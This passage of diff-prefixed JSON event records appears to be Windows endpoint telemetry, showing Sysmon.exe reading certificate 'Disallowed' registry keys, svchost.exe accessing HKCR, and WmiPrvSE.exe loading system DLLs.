2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmitomi.dll", - "image_path": "C:\\Windows\\System32\\wmitomi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573790740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573790740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NetTCPIP.dll", - "image_path": "C:\\Windows\\System32\\wbem\\NetTCPIP.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573790740000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 